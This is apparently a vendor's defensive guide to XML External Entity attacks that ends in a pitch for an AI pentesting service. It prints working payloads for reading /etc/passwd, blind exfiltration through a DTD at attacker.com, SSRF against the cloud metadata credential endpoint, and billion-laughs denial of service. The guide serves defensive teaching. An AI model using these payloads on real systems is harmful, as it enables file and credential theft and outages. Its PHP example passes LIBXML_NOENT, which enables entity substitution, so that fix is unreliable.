Defending Against XML External Entity Attacks

XML External Entity injection exploits dangerous XML parser configurations to read files, perform SSRF, and in some cases achieve remote code execution.

Introduction

Your application accepts XML uploads for data import—product catalogs, configuration files, or API requests. The parser uses default settings, which seems reasonable until an attacker submits XML containing an external entity reference to /etc/passwd. Suddenly, your server's password file appears in error messages, and the attacker begins reading configuration files containing database credentials.

XML External Entity (XXE) injection exploits XML parsers configured to process external entities—references to external resources that the parser resolves during document processing. When parsers follow these references, attackers can read local files, make requests to internal systems (SSRF), or cause denial of service. This guide explores XXE attacks and language-specific prevention techniques.

Understanding the Risk

XXE vulnerabilities exist because XML, by specification, supports powerful features that most applications don't need. External entities allow XML documents to reference and include external resources.

Basic XXE Attack: Reading local files through entity expansion:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<userInfo>
  <name>&xxe;</name>
</userInfo>

When the parser processes &xxe;, it reads /etc/passwd and substitutes the contents into the document. If the application reflects this data in responses or error messages, the attacker retrieves the file.

Blind XXE via Out-of-Band Exfiltration: When responses aren't visible, attackers use external connections:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
<data>&send;</data>

The attacker's DTD file exfiltrates file contents to their server.

XXE to SSRF: Using XXE to access internal services:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<request>&xxe;</request>

Denial of Service (Billion Laughs): Exponential entity expansion:

<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<lolz>&lol3;</lolz>

This expands exponentially, exhausting memory.

Prevention Best Practices

Java Prevention

Java's XML parsers require explicit disabling of multiple features:

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
 
// Disable DTDs entirely
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
 
// Disable external entities
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
 
// Disable external DTDs
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
 
// Disable XInclude
factory.setXIncludeAware(false);
factory.setExpandEntityReferences(false);

Python Prevention

Use the defusedxml library for safe parsing:

# Using defusedxml (recommended)
import defusedxml.ElementTree as ET
 
def parse_xml_safely(xml_string):
    return ET.fromstring(xml_string)
 
# If using lxml
from lxml import etree
 
def parse_with_lxml(xml_string):
    parser = etree.XMLParser(
        resolve_entities=False,
        no_network=True,
        dtd_validation=False,
        load_dtd=False
    )
    return etree.fromstring(xml_string.encode(), parser)

Install defusedxml:

pip install defusedxml

PHP Prevention

<?php
// Disable external entity loading globally
libxml_disable_entity_loader(true);
 
function parseXmlSafely($xmlString) {
    $dom = new DOMDocument();
    $dom->substituteEntities = false;
    $dom->resolveExternals = false;
    
    libxml_disable_entity_loader(true);
    $dom->loadXML($xmlString, LIBXML_NOENT);
    
    return $dom;
}
?>

Note: libxml_disable_entity_loader() is deprecated in PHP 8.0+ as external entities are disabled by default.

.NET Prevention

XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit;
settings.XmlResolver = null;
 
using (StringReader stringReader = new StringReader(xmlContent))
using (XmlReader reader = XmlReader.Create(stringReader, settings))
{
    doc.Load(reader);
}

Input Validation

Reject XML with DOCTYPE declarations as an additional layer:

def reject_dtd(xml_string):
    if '<!DOCTYPE' in xml_string.upper() or '<!ENTITY' in xml_string.upper():
        raise ValueError("DOCTYPE declarations not allowed")
    return xml_string

Consider JSON Alternatives

If your API doesn't require XML features, switch to JSON to eliminate XXE risk entirely.

Why Traditional Pentesting Falls Short

XXE vulnerabilities lurk in unexpected XML processing points—file uploads, SOAP endpoints, SVG handlers, Office document parsers, and configuration importers. Manual testers may check obvious XML inputs but miss edge cases where XML is processed indirectly.

Different parser libraries and versions have different default behaviors, requiring testers to understand the specific technology stack. Blind XXE exploitation requires out-of-band techniques that are time-consuming to set up and verify.

How AI-Powered Testing Solves It

RedVeil's AI agents identify XML processing points across your application, including file uploads, API endpoints, and indirect XML handling. The platform tests with various XXE payloads tailored to common parser configurations and frameworks.

When XXE vulnerabilities are detected, RedVeil demonstrates exploitability—whether through direct response disclosure or out-of-band exfiltration. The findings include specific parser configurations that need remediation and language-appropriate fixes.

Conclusion

XML External Entity injection exploits powerful XML features that most applications don't need. The vulnerability persists because XML parsers often enable dangerous features by default, and developers may not realize their application processes XML.

Effective defense requires disabling DTDs and external entities at the parser level. Language-specific configurations vary, but the principle is consistent: explicitly disable features you don't use. For applications that don't require XML's advanced features, consider JSON as a simpler, safer alternative.

AI-powered penetration testing from RedVeil identifies XXE vulnerabilities across your application's XML processing points, validating that parser configurations are secure.

Protect your applications from XXE attacks—test with RedVeil today.

Ready to run your own test?

Start your first RedVeil pentest in minutes.